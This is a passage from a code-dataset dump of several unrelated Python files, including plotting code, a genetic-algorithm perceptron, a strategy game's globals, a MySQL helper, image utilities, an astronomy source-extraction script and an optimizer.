set title and axis labels\n ax[c].set_title(country_names[country],fontsize=44, verticalalignment='baseline', loc='center')\n \n ax[c].set_ylabel('Predicted cumulative \\ncases',fontsize=32)\n ax[c].set_yscale('log')\n \n ax[c].set_xlim(np.datetime64('2020-01-15'),np.datetime64('2020-03-18'))\n \n ax[c].set_ylim(10,1e8)\n\n # dates on x axis\n days_all = mdates.DayLocator(interval=1) \n days_sparse = mdates.DayLocator(interval=10) \n formatter = mdates.DateFormatter(\"%b %d\")\n\n ax[c].xaxis.set_major_formatter(formatter)\n ax[c].xaxis.set_minor_locator(days_all)\n ax[c].xaxis.set_major_locator(days_sparse)\n\n # set to mostly match fig 3\n ax[c].tick_params(axis='x', which='major', labelsize=28, length=10, width=4)\n ax[c].tick_params(axis='x', which='minor', length=5, width=1.5)\n ax[c].tick_params(axis='y', which='major', labelsize=26, length=8, width=1)\n \n ax[c].tick_params(axis='y', which='minor', labelsize=26, length=5, width=.1)\n ax[c].set_yticks(ax[c].get_yticks(minor=True)[::5],minor=True);\n ax[c].set_yticks(np.logspace(1,8,base=10,num=8));\n \n sns.despine(ax=ax[c],top=True)\n sns.despine(ax=ax[c],top=True)\n\n # thicken the axes\n plt.setp(ax[c].spines.values(), linewidth=2)\n ax[c].grid(lw=1)\n \n\n # add a legend axis\n leg_ax = fig.add_axes([1.0, 0.6, 0.2, 0.2])\n\n leg = leg_ax.legend(handles=legend_dict['lines'],\n labels=legend_dict['labels'],\n loc=(0.42,0.82),\n fontsize=32,\n title=\"Legend\", \n frameon=False,\n markerscale=3)\n \n leg._legend_box.align = \"left\"\n plt.setp(leg.get_title(),fontsize=44)\n\n leg_ax.axis('off')\n\n if save_fig:\n out_fn = fig_dir / fig_name\n print(\"saving fig in {0}\".format(out_fn))\n plt.savefig(out_fn,bbox_inches='tight',bbox_extra_artists=(leg,))\n \nif __name__ == '__main__':\n main()\n \n","sub_path":"codes/plotting/gen_fig4.py","file_name":"gen_fig4.py","file_ext":"py","file_size_in_byte":13951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"219033463","text":"import evolution as evo\n\nclass GeneticPerceptronParams(evo.EvolutionParamsInterface):\n\n def __init__(self, data, labels, thresh, pop_size):\n\n gen_params = {\n \"len\" : len(data[0]) + 1\n }\n \n sel_params = {\n 'k' : 5,\n 'w' : [1, 1, 1, 1, 1],\n \"tourn_size\" : pop_size // 5\n }\n\n sco_params = {\n \"data\" : data,\n \"labels\" : labels\n }\n\n cro_params = {\n 'w' : [1, 1]\n }\n\n mut_params = {\n \"mut_fns\" : [evo.Mutation.real_vector_gaussian,\n evo.Mutation.real_vector_negate,\n evo.Mutation.real_vector_random_negate],\n \"mut_params\" : { \"mean\" : 0, \"var\" : 1, \"num_to_negate\" : 1}\n }\n\n super().__init__(gen_params, sel_params, sco_params,\n cro_params, mut_params, thresh, pop_size)\n\n def gen_fn(self, params):\n return evo.Generation.random_gaussian_vector(params)\n\n def sel_fn(self, population, pop_size, sco_fn, scoring_params, params):\n return evo.Selection.tournament(population, pop_size,\n sco_fn, scoring_params,\n params)\n\n def sco_fn(self, individual, params):\n data = params[\"data\"]\n labels = params[\"labels\"]\n\n data_len = len(data)\n\n bias = individual[0]\n weights = individual[1:]\n correctly_classified = 0\n for datum, i in zip(data, range(0, data_len)):\n weighted_sum = bias\n for weight, value in zip(weights, datum):\n weighted_sum += weight * value\n if weighted_sum > 0:\n classification = 1\n else:\n classification = 0\n if classification == labels[i]:\n correctly_classified += 1\n return correctly_classified / data_len\n \n def cro_fn(self, i1, i2, params):\n 
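# Delegates to the library's uniform crossover. A sketch of what that\n # presumably does (assumption -- the evolution module is not shown here):\n # child = [a if random.random() < 0.5 else b for a, b in zip(i1, i2)]\n 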
return evo.Crossover.uniform(i1, i2, params)\n\n def mutator(self, individual, params):\n return evo.Mutator.equal_choice(individual, params)\n\nif __name__ == \"__main__\":\n\n path_to_data = \"Data/\"\n \n tr_data_file = input(\"Training Data file: \")\n tr_data_file = open(path_to_data + tr_data_file)\n tr_data = list(map(lambda d: d.strip().split(','), tr_data_file.readlines()))\n tr_data_file.close()\n\n te_data_file = input(\"Testing Data file: \")\n te_data_file = open(path_to_data + te_data_file)\n te_data = list(map(lambda d: d.strip().split(','), te_data_file.readlines()))\n te_data_file.close()\n\n label_to_classify = 8\n\n tr_labels = []\n for datum, i in zip(tr_data, range(0, len(tr_data))):\n int_datum = list(map(lambda v: int(v), datum))\n tr_data[i] = int_datum[1:]\n tr_labels.append(1 if int_datum[0] == label_to_classify else 0)\n\n te_labels = []\n for datum, i in zip(te_data, range(0, len(te_data))):\n int_datum = list(map(lambda v: int(v), datum))\n te_data[i] = int_datum[1:]\n te_labels.append(1 if int_datum[0] == label_to_classify else 0)\n\n thresh = 1.00\n pop_size = 50\n\n evo_params = GeneticPerceptronParams(tr_data, tr_labels, thresh, pop_size)\n\n ended = False\n\n while not ended:\n weights, score = evo.evolution_driver(evo_params, True, 1)\n\n testing_params = {\n \"data\" : te_data,\n \"labels\" : te_labels\n }\n\n print(\"\\nTesting weights... \", end='')\n testing_score = evo_params.sco_fn(weights, testing_params)\n print(\"Done\")\n\n print(\"\\nTesting score: {!s}\".format(testing_score))\n\n ended = input(\"\\nContinue? (y/n): \").lower() not in ['yes', 'y']\n","sub_path":"Genetic Algorithms/Python GA/genetic_perceptron.py","file_name":"genetic_perceptron.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"215814665","text":"\"\"\"\nModule to contain globals. 
\nSince only one game can be played at once a singleton seems appropriate.\n\"\"\"\nimport logging\nimport pygame\n\nfrom galaxy import Galaxy\nimport ship\nimport faction\nfrom model import event_log\n\nfactions = []\nships = {}\ngalaxy = Galaxy()\nturn_count = 1\ngame_mode = None\n\ndef check_elimination():\n accumulators = {}\n for faction in factions:\n accumulators[faction] = 0\n for world in galaxy.planets.values():\n if world.owner != None:\n accumulators[world.owner] += 1\n for faction in accumulators.keys():\n if accumulators[faction] < 1: # Eliminate factions with no worlds.\n faction.eliminate() \n\n# Generation parameters.\ngalaxy_size = (50,50)\nworld_density = float(1)/25\ngeneration_seed = None\nnumber_of_initial_factions = 2 \n\ndef set_galaxy_size(size):\n \"\"\"Set the size of the game's galaxy.\"\"\"\n global galaxy_size\n galaxy_size = size\ndef set_world_density(density):\n \"\"\"Set the world generation density.\"\"\"\n global world_density\n world_density = density\ndef set_galaxy_seed(seed):\n \"\"\"Generate a particular galaxy.\"\"\"\n global generation_seed\n generation_seed = seed \ndef set_number_of_factions(num):\n \"\"\"Set the number of player-character factions.\"\"\"\n global number_of_initial_factions\n number_of_initial_factions = num\n \ndef init():\n global galaxy, factions, ships, turn_count\n global galaxy_size, world_density, generation_seed\n global number_of_initial_factions\n factions = []\n ships = {}\n (w,h) = galaxy_size\n galaxy = Galaxy(w,h, world_density, generation_seed)\n turn_count = 1\n # faction.PLAYERFACTION = factions[0]\n \n for _ in range(number_of_initial_factions):\n galaxy.add_player()\n \n for y in range(galaxy.height):\n for x in range(galaxy.width):\n ships[x,y] = []\n \n event_log.reset()\n\nlog = logging.getLogger(__name__)\n\ndef _do_end_of_turn():\n \"\"\"End of turn processing.\"\"\"\n global turn_count, ships\n log.debug(\"End of turn \"+str(turn_count)+\".\")\n turn_count += 1\n \n event_log.reset()\n \n for faction in factions:\n faction.tick()\n for planet in galaxy.planets.values():\n planet.tick()\n ships = ship.process_ship_turn(ships)\n \n # Blockades\n for planet in galaxy.planets.values():\n for a in ships[planet.position]:\n if a.faction != planet.owner and a.attack >0 and planet.owner != None:\n # This planet is blockaded\n if planet.blockaded == False:\n event_log.add(event_log.Event(planet.name+str(\" blockaded\"),\n planet.position,a.faction))\n planet.blockaded = True\n \n \n check_elimination()\n \n if len(factions) < 2:\n event = pygame.event.Event(pygame.USEREVENT,action=\"End of Game\")\n pygame.event.post(event)\n \n event = pygame.event.Event(pygame.USEREVENT, action=\"End of Turn\")\n pygame.event.post(event)\n \n\n\ndef end_of_turn(faction):\n \"\"\"\n Mark a given faction's turn as complete.\n When all factions are marked as complete process the turn and resume.\n \"\"\"\n \n ship.sensor_map_dirty = True\n \n faction.ready = True\n log.debug(faction.name+\" marked ready.\")\n \n def check():\n for faction in factions:\n if faction.ready == False:\n return False\n return True\n \n if check():\n _do_end_of_turn()\n for faction in factions:\n faction.ready = False\n return\n \n","sub_path":"duelfieldstars/model/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"642726351","text":"import pymysql\n\n\nclass DBUtil:\n def __init__(self):\n self.conn = 
pymysql.connect(host=\"localhost\", port=3306, db=\"wxy\", user=\"root\", passwd=\"root\")\n\n def update(self, sql, values):\n cur = self.conn.cursor()\n try:\n cur.execute(sql, values)\n self.conn.commit()\n return True\n except Exception:\n # roll back the partial transaction instead of leaving it open\n self.conn.rollback()\n return False\n finally:\n cur.close()\n\n def query(self, sql, values):\n cur = self.conn.cursor(cursor=pymysql.cursors.DictCursor)\n try:\n cur.execute(sql, values)\n return cur.fetchall()\n except Exception:\n return None\n finally:\n cur.close()\n\n def close(self):\n self.conn.close()\n","sub_path":"dbutil.py","file_name":"dbutil.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"84307911","text":"import sys,os,pickle,uuid,cv2,glob,csv\nimport matplotlib.pyplot as plt\nimport os.path as osp\nimport numpy as np\nimport numpy.random as npr\nfrom core.config import cfg,iconicImagesFileFormat\nfrom utils.base import scaleImage\n\ndef cropImageToAnnoRegion(im_orig,box):\n x1 = box[0]\n y1 = box[1]\n x2 = box[2]\n y2 = box[3]\n return scaleCroppedImage(im_orig[y1:y2, x1:x2])\n\ndef scaleCroppedImage(im_orig):\n return scaleImage(im_orig,cfg.CROPPED_IMAGE_SIZE)\n\ndef scaleRawImage(im_orig):\n return scaleImage(im_orig,cfg.RAW_IMAGE_SIZE)\n\ndef addImgBorder(img,border=255):\n img[0,:,:] = border\n img[-1,:,:] = border\n img[:,0,:] = border\n img[:,-1,:] = border\n\ndef getImageWithBorder(_img,border=255,rotation=None):\n img = _img.copy()\n if cfg._DEBUG.utils.misc: print(\"[save_image_with_border] rotation\",rotation)\n if rotation:\n angle,cols,rows = rotation[0],rotation[1],rotation[2]\n rotationMat,scale = getRotationInfo(angle,cols,rows)\n if cfg._DEBUG.utils.misc: print(\"[utils/misc.py] rotationMat\",rotationMat)\n img_blank = np.zeros(img.shape,dtype=np.uint8)\n addImgBorder(img_blank,border=border)\n if cfg._DEBUG.utils.misc: print(img_blank.shape)\n img_blank = cv2.warpAffine(img_blank,rotationMat,(cols,rows),scale)\n img += img_blank\n addImgBorder(img,border=border)\n return img\n\ndef save_image_with_border(fn,_img,border=255,rotation=None):\n img = getImageWithBorder(_img,border=border,rotation=rotation)\n fp = osp.join(cfg.ROTATE_PATH,fn)\n cv2.imwrite(fp,img)\n\ndef concatenate_images(image1,image2,average_size=False,axis=1):\n # make the input larger along the width\n # axis = 0 or 1\n if average_size:\n # align image size on both dims\n average_shape = np.mean([image1.shape, image2.shape],axis=0,dtype=np.int)\n scaled_image1 = scaleImage(image1,average_shape)\n scaled_image2 = scaleImage(image2,average_shape)\n else:\n # align image size on \"axis\" dim\n average_shape = np.mean([image1.shape, image2.shape],axis=0,dtype=np.int)\n not_axis = np.abs(axis-1)\n shape1 = [average_shape[axis],average_shape[axis]]\n shape2 = [average_shape[axis],average_shape[axis]]\n shape1[not_axis] = image1.shape[not_axis]\n shape2[not_axis] = image2.shape[not_axis]\n scaled_image1 = scaleImage(image1,shape1)\n scaled_image2 = scaleImage(image2,shape2)\n concat_image = np.concatenate((scaled_image1,scaled_image2),axis=axis)\n # print(\"concat_image.shape\",concat_image.shape)\n return concat_image\n\ndef splitImageForSiameseNet(img,axis=1,location=\"middle\"):\n if location == \"middle\":\n if axis == 1:\n half_index = img.shape[1]//2\n img1 = img[:,:half_index,:]\n img2 = img[:,half_index:,:]\n return [img1,img2]\n else:\n print(\"[image_utils.py splitImageForSiameseNet]: can't handle axis {}\".format(axis))\n exit()\n else:\n print(\"[image_utils.py splitImageForSiameseNet]: 
unknown split location {}\".format(location))\n exit()\n\ndef save_image_list_to_file(image_list,append_str_l,vis=False,size=cfg.CROPPED_IMAGE_SIZE,infix=None):\n print(\"[./utils/image_utils.py: save_image_list_to_file]: saving images\")\n useAppendStr = append_str_l is not None and len(append_str_l) == len(image_list)\n prev_img = image_list[0]\n for idx,img in enumerate(image_list):\n # print(img.max(),img.min())\n # print(img.shape)\n if img.max() <= 1: # rescaleImageValues\n img[:,:,:] *= 255\n #img[:size,:size,:] += cfg.PIXEL_MEANS\n img = img.astype(np.uint8)\n if idx >= 1:\n print(prev_img[15:17,15:17])\n print(img[15:17,15:17])\n print(np.all(prev_img == img))\n prev_img = img\n fn = \"save_image_list_image\"\n if infix:\n fn += \"_{}\".format(infix)\n if useAppendStr:\n fn += \"{}_{}.png\".format(idx,append_str_l[idx])\n else:\n fn += \"{}.png\".format(idx)\n\n print(fn)\n if vis is False:\n cv2.imwrite(fn,img)\n else:\n plt.imshow(img[:,:,::-1])\n plt.show()\n\n","sub_path":"lib/utils/image_utils.py","file_name":"image_utils.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"597903930","text":"###### Running SExtractor on simulated galsim images\n\n## Import script for SExtractor\n#Script written by A. Guinot : https://github.com/aguinot\n\nimport numpy as np\nfrom sep_script import Run_Sep\n\n#SEP params\nBIG_DISTANCE = 1e30\nNO_BLEND = 0\nBLEND = 1\nMISS_EXTRACTION = 16\n\n#Path to images\ntestpath = '/Users/lacan/Cosmostat/Codes/BlendHunter'\n\ndef extract_test_images(path):\n img = np.load(path, allow_pickle=True)\n test_img = img[36000:40000]\n return test_img\n\n\n# Run sep function\ndef sep_results(blends=None,no_blends=None, sigma_val=None,path=None):\n runner = Run_Sep()\n flags_b, sep_res_b = runner.process(blends)\n flags_nb, sep_res_nb = runner.process(no_blends)\n\n #Display results\n acc = (len(np.where(flags_b == 1)[0])+len(np.where(flags_nb == 0)[0]))/(len(flags_b)+len(flags_nb))\n\n #concatenate flags\n flags = np.concatenate((flags_b, flags_nb), axis =0)\n sep_res = np.concatenate((sep_res_b, sep_res_nb), axis =0)\n\n #save (create 'sep_results_8000' folder)\n np.save(path+'/sep_results_8000/flags{}.npy'.format(sigma_val), flags)\n np.save(path+'/sep_results_8000/sep_res{}.npy'.format(sigma_val), sep_res)\n print('Sep Accuracy (sigma{}): {}%'.format(sigma_val, acc*100))\n n_miss = (len(np.where(flags_b == 16)[0])+len(np.where(flags_nb == 16)[0]))/(len(flags_b)+len(flags_nb))\n print('Misidentified : {}%'.format(n_miss*100))\n\n return flags\n\nsigmas = np.array([[5,51,52 ,53, 54], [14,141,142,143,144], [18,181,182,183,184],\n [26,261,262,263,264], [35,351,352,353,354], [40,401,402,403,404]])\n\n'''1. $\\sigma_{noise} = 5$'''\n################## #######################################################\npaths5 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[0]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[0]]])\n#Getting the images\nblended_5 = [extract_test_images(paths5[0][j]) for j in range(5)]\nnot_blended_5 = [extract_test_images(paths5[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[0]):\n sep_results(blends=blended_5[i], no_blends = not_blended_5[i], sigma_val=j, path=testpath)\n\n'''2. 
$\\sigma_{noise} = 14$'''\n###################################################################\npaths14 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[1]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[1]]])\n#Getting the images\nblended_14 = [extract_test_images(paths14[0][j]) for j in range(5)]\nnot_blended_14 = [extract_test_images(paths14[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[1]):\n sep_results(blends=blended_14[i], no_blends = not_blended_14[i], sigma_val=j, path=testpath)\n\n'''3. $\\sigma_{noise} = 18$'''\n#####################################################################\npaths18 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[2]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[2]]])\n#Getting the images\nblended_18 = [extract_test_images(paths18[0][j]) for j in range(5)]\nnot_blended_18 = [extract_test_images(paths18[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[2]):\n sep_results(blends=blended_18[i], no_blends = not_blended_18[i], sigma_val=j, path=testpath)\n\n'''4. $\\sigma_{noise} = 26$'''\n####################################################################\npaths26 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[3]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[3]]])\n#Getting the images\nblended_26 = [extract_test_images(paths26[0][j]) for j in range(5)]\nnot_blended_26 = [extract_test_images(paths26[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[3]):\n sep_results(blends=blended_26[i], no_blends = not_blended_26[i], sigma_val=j, path=testpath)\n\n'''5. $\\sigma_{noise} = 35$'''\n######################################################################\npaths35 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[4]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[4]]])\n#Getting the images\nblended_35 = [extract_test_images(paths35[0][j]) for j in range(5)]\nnot_blended_35 = [extract_test_images(paths35[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[4]):\n sep_results(blends=blended_35[i], no_blends = not_blended_35[i], sigma_val=j, path=testpath)\n\n'''6. 
$\\sigma_{noise} = 40$'''\n#####################################################################\npaths40 = np.array([[testpath+'/images_noisy/blended_noisy{}.npy'.format(i) for i in sigmas[5]],\n [testpath+'/images_noisy/not_blended_noisy{}.npy'.format(i) for i in sigmas[5]]])\n#Getting the images\nblended_40 = [extract_test_images(paths40[0][j]) for j in range(5)]\nnot_blended_40 = [extract_test_images(paths40[1][j]) for j in range(5)]\n\n####Run sep\nfor i,j in zip(range(5), sigmas[5]):\n sep_results(blends=blended_40[i], no_blends = not_blended_40[i], sigma_val=j, path=testpath)\n\n'''REAL IMAGES '''\n####################################################################\npath_real = ['/Users/lacan/Cosmostat/Codes/BlendHunter/bh_real/blended_noisy.npy',\n '/Users/lacan/Cosmostat/Codes/BlendHunter/bh_real/not_blended_noisy.npy']\n\n#Getting the images blended and not blended\nblended_real = extract_test_images(path_real[0])\nnot_blended_real = extract_test_images(path_real[1])\n\n#Run sep\nsep_results(blends=blended_real, no_blends = not_blended_real, sigma_val='real', path=testpath)\n\n'''Padded images '''\n####################################################################\npath_pad5 = ['/Users/lacan/Cosmostat/Codes/BlendHunter/bh_pad5/blended_noisy.npy',\n '/Users/lacan/Cosmostat/Codes/BlendHunter/bh_pad5/not_blended_noisy.npy']\n\n#Getting the images blended and not blended\nblended_pad5 = extract_test_images(path_pad5[0])\nnot_blended_pad5 = extract_test_images(path_pad5[1])\n\n#Run sep\nrunner_pad5 = Run_Sep()\nflags_b_pad5, sep_res_b_pad5 = runner_pad5.process(blended_pad5)\nflags_nb_pad5, sep_res_nb_pad5 = runner_pad5.process(not_blended_pad5)\n\n#Display results\nacc_pad5 = (len(np.where(flags_b_pad5 == 1)[0])+len(np.where(flags_nb_pad5 == 0)[0]))/(len(flags_b_pad5)+len(flags_nb_pad5))\nprint('Sep Accuracy (pad_35) : {}%'.format(acc_pad5*100))\n\n\n\n'''Mixed noise in dataset '''\n####################################################################\npath_mn = ['/Users/lacan/Cosmostat/Codes/BlendHunter/bh_mix_close/blended_noisy.npy',\n '/Users/lacan/Cosmostat/Codes/BlendHunter/bh_mix_close/not_blended_noisy.npy']\n\n#Getting the images blended and not blended\nblended_mn = extract_test_images(path_mn[0])\nnot_blended_mn = extract_test_images(path_mn[1])\n\n#Run sep\nrunner_mn = Run_Sep()\nflags_b_mn, sep_res_b_mn = runner_mn.process(blended_mn)\nflags_nb_mn, sep_res_nb_mn = runner_mn.process(not_blended_mn)\n\n#Display results\nacc_mn = (len(np.where(flags_b_mn == 1)[0])+len(np.where(flags_nb_mn == 0)[0]))/(len(flags_b_mn)+len(flags_nb_mn))\nprint('Sep Accuracy (mixed noise) : {}%'.format(acc_mn*100))\n","sub_path":"sextractor/run_sextractor.py","file_name":"run_sextractor.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"475762307","text":"from math import sqrt, ceil, log, isnan\nfrom datetime import datetime\nfrom scipy.sparse.linalg import LinearOperator\nfrom scipy.sparse.linalg import eigsh\nimport numpy as np\n\ndef HSODM(w, loss, gradient, Hv=None, hessian=None, X=None, Y=None, opt=None,**kwargs):\n\n\n print ('--- HSODM ---\\n')\n\n if X is None:\n n=1\n d=1\n else:\n n = X.shape[0]\n d = X.shape[1]\n\n grad_tol = opt.get('grad_tol', 1e-6)\n n_iterations = opt.get('n_iterations', 20)\n\n\n # Sampling\n Hessian_sampling_flag = opt.get('Hessian_sampling', False)\n gradient_sampling_flag = opt.get('gradient_sampling', False)\n\n if gradient_sampling_flag == True or 
Hessian_sampling_flag == True:\n assert (X is not None and Y is not None), \"Subsampling is only possible if data is passsed, i.e. X and Y may not be none\"\n\n initial_sample_size_Hessian = opt.get('initial_sample_size_Hessian', 0.05)\n initial_sample_size_gradient = opt.get('initial_sample_size_gradient', 0.05)\n sample_scaling_Hessian = opt.get('sample_scaling_Hessian', 1)\n sample_scaling_gradient = opt.get('sample_scaling_gradient', 1)\n unsuccessful_sample_scaling = opt.get('unsuccessful_sample_scaling', 1.25)\n sampling_scheme = opt.get('sampling_scheme', 'linear')\n if Hessian_sampling_flag == False and gradient_sampling_flag == False:\n sampling_scheme = None\n\n print(\"- Hessian_sampling:\", Hessian_sampling_flag)\n print(\"- Gradient_sampling:\", gradient_sampling_flag)\n print(\"- Sampling_scheme:\", sampling_scheme, \"\\n\")\n\n ### -> no opt call after here!!\n k = 0\n n_samples_seen = 0\n\n loss_collector = []\n timings_collector = []\n samples_collector = []\n\n _loss = loss(w, X, Y, **kwargs)\n loss_collector.append(_loss)\n timings_collector.append(0)\n samples_collector.append(0)\n\n start = datetime.now()\n timing = 0\n\n if sampling_scheme == 'exponential':\n exp_growth_constant = ((1 - initial_sample_size_Hessian) * n) ** (1 / n_iterations)\n\n for i in range(n_iterations):\n\n grad = gradient(w, X, Y, **kwargs)\n grad_norm = np.linalg.norm(grad)\n\n ## a) determine batchsize ##\n if sampling_scheme == 'exponential':\n sample_size_Hessian = Hessian_sampling_flag * (\n int(min(n, n * initial_sample_size_Hessian + exp_growth_constant ** (i + 1))) + 1) + (\n 1 - Hessian_sampling_flag) * n\n sample_size_gradient = gradient_sampling_flag * (\n int(min(n, n * initial_sample_size_gradient + exp_growth_constant ** (i + 1))) + 1) + (\n 1 - gradient_sampling_flag) * n\n\n elif sampling_scheme == 'linear':\n sample_size_Hessian = Hessian_sampling_flag * int(\n min(n, max(n * initial_sample_size_Hessian, n / n_iterations * (i + 1)))) + (\n 1 - Hessian_sampling_flag) * n\n sample_size_gradient = gradient_sampling_flag * int(\n min(n, max(n * initial_sample_size_gradient, n / n_iterations * (i + 1)))) + (\n 1 - gradient_sampling_flag) * n\n else:\n sample_size_Hessian = n\n sample_size_gradient = n\n\n ## b) draw batches ##\n ## take the batches.\n if sample_size_Hessian < n:\n int_idx_Hessian = np.random.randint(0, high=n, size=sample_size_Hessian)\n bool_idx_Hessian = np.zeros(n, dtype=bool)\n bool_idx_Hessian[int_idx_Hessian] = True\n _X = np.zeros((sample_size_Hessian, d))\n _X = np.compress(bool_idx_Hessian, X, axis=0)\n _Y = np.compress(bool_idx_Hessian, Y, axis=0)\n\n else:\n _X = X\n _Y = Y\n\n if sample_size_gradient < n:\n int_idx_gradient = np.random.randint(0, high=n, size=sample_size_gradient)\n bool_idx_gradient = np.zeros(n, dtype=bool)\n bool_idx_gradient[int_idx_gradient] = True\n _X2 = np.zeros((sample_size_gradient, d))\n _X2 = np.compress(bool_idx_gradient, X, axis=0)\n _Y2 = np.compress(bool_idx_gradient, Y, axis=0)\n\n else:\n _X2 = X\n _Y2 = Y\n\n n_samples_per_step = sample_size_Hessian + sample_size_gradient\n\n if gradient_sampling_flag==True:\n grad = gradient(w, _X2, _Y2, **kwargs)\n grad_norm = np.linalg.norm(grad)\n if grad_norm < grad_tol:\n break\n\n if Hessian_sampling_flag == True:\n hess = hessian(w, _X, _Y, **kwargs)\n\n ## do the line search\n delta_lb = 1e-1\n delta_ub = 5e-2\n ratio = 0.8\n linesearch_tol = 1e-3\n\n enable_linesearch = 0\n\n if enable_linesearch:\n (delta, s) = delta_linesearch(delta_lb, delta_ub, grad, hess, ratio, 
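# delta_linesearch (defined at the bottom of this file) bisects on delta\n # until the homogeneous step s roughly satisfies ||s|| = ratio * (-lambda_min)\n 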
linesearch_tol) \n else:\n delta = 0.1\n grad_transpose = np.expand_dims(grad, axis=1)\n F = np.block([[hess, grad_transpose], [grad, -delta]])\n \n kk_start = datetime.now()\n # Compute the leftmost eigenvector of F\n _, eigenvector = eigsh(F, k=1, which='SA', tol=1e-5, return_eigenvectors=True)\n kk_timing = (datetime.now() - kk_start).total_seconds()\n print(kk_timing)\n eigenvector = eigenvector.reshape((F.shape[0], ))\n s = eigenvector[0:F.shape[0]-1] / eigenvector[-1]\n\n\n stepnorm = np.linalg.norm(s)\n\n\n previous_f = loss(w, X, Y, **kwargs)\n\n if np.dot(s, grad) > 0:\n s = -s\n\n beta = 0.8\n for kk in range(25):\n current_f = loss(w + (beta**kk) * s, X, Y, **kwargs)\n _loss = current_f\n function_decrease = previous_f - current_f\n if function_decrease > 0:\n w = w + (beta**kk) * s\n break\n\n print('----function decrease:----')\n print(function_decrease)\n\n n_samples_seen += n_samples_per_step\n\n\n _timing = timing\n timing = (datetime.now() - start).total_seconds()\n print('Iteration ' + str(i) + ': loss = ' + str(_loss) + ' norm_grad = ' + str(\n grad_norm), 'time= ', round(timing - _timing, 3), 'stepnorm=', stepnorm, 'Samples Hessian=',\n sample_size_Hessian, 'samples Gradient=', sample_size_gradient, 'delta=', delta, 'kk=', kk, \"\\n\")\n\n timings_collector.append(timing)\n samples_collector.append(n_samples_seen)\n loss_collector.append(_loss)\n\n k += 1\n\n return w, timings_collector, loss_collector, samples_collector\n\ndef delta_linesearch(delta_lb, delta_ub, grad, hess, ratio, linesearch_tol):\n\n grad_transpose = np.expand_dims(grad, axis=1)\n while (abs(delta_ub-delta_lb) > linesearch_tol):\n delta = (delta_ub+delta_lb) / 2\n F = np.block([[hess, grad_transpose],\n [grad, -delta]])\n eigenvalue, eigenvector = eigsh(F, k=1, which='SA', tol=1e-3, return_eigenvectors=True)\n eigenvector = eigenvector.reshape((F.shape[0], ))\n s = eigenvector[0:F.shape[0]-1] / eigenvector[-1]\n if np.linalg.norm(s) < ratio * (-eigenvalue):\n delta_lb = delta\n else:\n delta_ub = delta\n\n return delta, s\n\n\n\n\n\n\n","sub_path":"hsodm.py","file_name":"hsodm.py","file_ext":"py","file_size_in_byte":7350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"212115061","text":"\"\"\"\nBeautiful Arrangement\nSuppose you have n integers from 1 to n. 
We define a beautiful arrangement as an array that is constructed by these n numbers successfully if one of the following is true for the ith position (1 <= i <= n) in this array:\n\nThe number at the ith position is divisible by i.\ni is divisible by the number at the ith position.\nGiven an integer n, return the number of the beautiful arrangements that you can construct.\n\n\n\nExample 1:\n\nInput: n = 2\nOutput: 2\nExplanation:\nThe first beautiful arrangement is [1, 2]:\nNumber at the 1st position (i=1) is 1, and 1 is divisible by i (i=1).\nNumber at the 2nd position (i=2) is 2, and 2 is divisible by i (i=2).\nThe second beautiful arrangement is [2, 1]:\nNumber at the 1st position (i=1) is 2, and 2 is divisible by i (i=1).\nNumber at the 2nd position (i=2) is 1, and i (i=2) is divisible by 1.\nExample 2:\n\nInput: n = 1\nOutput: 1\n\n\nConstraints:\n\n1 <= n <= 15\n\"\"\"\n\n\nclass Solution:\n dp = {}\n\n def countArrangement(self, n: int) -> int:\n # Solution 1 - 184 ms\n \"\"\"\n self.ans = 0\n nums = [x for x in range(1, n + 1)]\n\n def dfs(curr, nums, j):\n if len(curr) == n:\n self.ans += 1\n else:\n for i in range(len(nums)):\n if nums[i] % j == 0 or j % nums[i] == 0:\n dfs(curr + [nums[i]], nums[:i] + nums[i + 1:], j - 1)\n\n dfs([], nums, n)\n return self.ans\n \"\"\"\n # Solution 2 - 32 ms\n arr = tuple(range(1, n + 1))\n\n def dfs(arr):\n i = len(arr)\n if i == 1:\n return 1\n if arr in self.dp:\n return self.dp[arr]\n ans = 0\n for j, val in enumerate(arr):\n if val % i == 0 or i % val == 0:\n ans += dfs(arr[:j] + arr[j + 1:])\n self.dp[arr] = ans\n return ans\n\n return dfs(arr)\n\n\n# Main Call\nn = 2\nsolution = Solution()\nprint(solution.countArrangement(n))\n","sub_path":"src/integers/countArrangement.py","file_name":"countArrangement.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"574016911","text":"import yaml\n\nfrom joueur import 